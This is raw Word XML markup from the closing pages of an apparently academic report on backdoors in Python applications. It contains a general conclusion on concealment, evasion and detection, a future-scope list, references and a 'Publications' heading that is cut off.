            <w14:solidFill>
              <w14:srgbClr w14:val="3F6797"/>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-350651</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>497668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6360612" cy="3359647"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="152400" distB="152400"/>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35">
                      <a:extLst/>
                    </a:blip>
                    <a:srcRect l="0" t="0" r="0" b="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6360612" cy="3359647"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w: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rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="83"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId36"/>
          <w:footerReference w:type="default" r:id="rId37"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1560" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="3f6797"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="3f6797"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="3F6797"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>final output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="3f6797"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="3f6797"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="3F6797"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
          <wp:anchor distT="152400" distB="152400" distL="152400" distR="152400" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-453201</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>5026921</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6565900" cy="3008004"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="152400" distB="152400"/>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38">
                      <a:extLst/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6565900" cy="3008004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:outline w:val="0"/>
          <w:color w:val="3f6797"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:color="3f6797"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:srgbClr w14:val="3F6797"/>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-453201</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:posOffset>805124</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6565900" cy="3276792"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="152400" distB="152400"/>
            <wp:docPr id="1073741845" name="officeArt object" descr="Image"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="1073741845" name="Image" descr="Image"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39">
                      <a:extLst/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6565900" cy="3276792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700" cap="flat">
                      <a:noFill/>
                      <a:miter lim="400000"/>
                    </a:ln>
                    <a:effectLst/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:ind w:left="3236" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="183"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The threat of undetectable backdoors in Python applications poses a significant challenge in cybersecurity. This study aimed to investigate the techniques used to create such backdoors, understand their evasion methods, and develop effective detection and mitigation strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key findings include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Concealment Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attackers use code obfuscation, encryption, and legitimate-looking network communications to hide backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Evasion Methods:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Advanced backdoors can evade detection by traditional security mechanisms like static analysis and antivirus software.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Indicators of Compromise (IoCs):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Specific behavioral patterns and anomalies can signal the presence of backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enhanced Detection Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Combining static and dynamic analysis with machine learning models and advanced network traffic analysis can improve detection rates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Practical Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Applying these strategies in real-world scenarios and continuous monitoring are essential to maintain security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1521" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId40"/>
          <w:footerReference w:type="default" r:id="rId41"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By addressing these areas, the study provides a comprehensive approach to enhancing the security of Python applications against undetectable backdoors. Continued research and development of detection technologies, along with increased awareness and best practices, are crucial in mitigating these threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:before="66"/>
        <w:ind w:left="3073" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>FUTURE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> SCOPE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Future Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Advanced Detection Techniques:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Develop machine learning models and AI-driven analysis for detecting sophisticated backdoors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Create effective deobfuscation tools and improve pattern recognition algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Dynamic Analysis Improvements:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Enhance runtime behavior analysis and automated sandboxing for safer code analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Real-Time Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Integrate real-time monitoring with development environments and implement real-time anomaly detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Cross-Platform Security:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Expand research to include cross-platform backdoor detection and investigate IoT and embedded systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Community and Industry Collaboration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Encourage open-source contributions and form industry partnerships to share knowledge and resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Educational Initiatives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="306" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="100" w:right="1514" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId42"/>
          <w:footerReference w:type="default" r:id="rId43"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1500" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Develop training programs for secure coding practices to raise awareness and skills among developers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="3246" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="39"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1. Garfinkel, T., &amp; Rosenblum, M. (2003). "A Virtual Machine Introspection Based Architecture for Intrusion Detection."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Sobell, M. G. (2019). A Practical Guide to Ubuntu Linux. Pearson Education.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Hoglund, G., &amp; Butler, J. (2006). Rootkits: Subverting the Windows Kernel. Addison-Wesley.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Jacob, M., Kirda, E., &amp; Kruegel, C. (2008). "Dynamic detection of kernel-level rootkits."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Bishop, M. (2003). Computer Security: Art and Science. Addison-Wesley.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6. Seltzer, M., et al. (1996). "Dealing with Disaster: Surviving Misbehaved Kernel Extensions."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7. Seshadri, A., et al. (2007). "SecVisor: A tiny hypervisor for lifetime kernel code integrity."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8. Rabek, J. C., et al. (2003). "Detection of injected, dynamically generated, and obfuscated malicious code."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9. Xu, W., et al. (2007). "Anomaly detection using program control flow graphs."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading 3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="rId44"/>
          <w:footerReference w:type="default" r:id="rId45"/>
          <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
          <w:pgMar w:top="1920" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="721"/>
          <w:bidi w:val="0"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10. Yegneswaran, V., et al. (2003). "Internet intrusions: global characteristics and prevalence."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="58"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:before="0"/>
        <w:ind w:left="3087" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="0"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PUBLICATIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
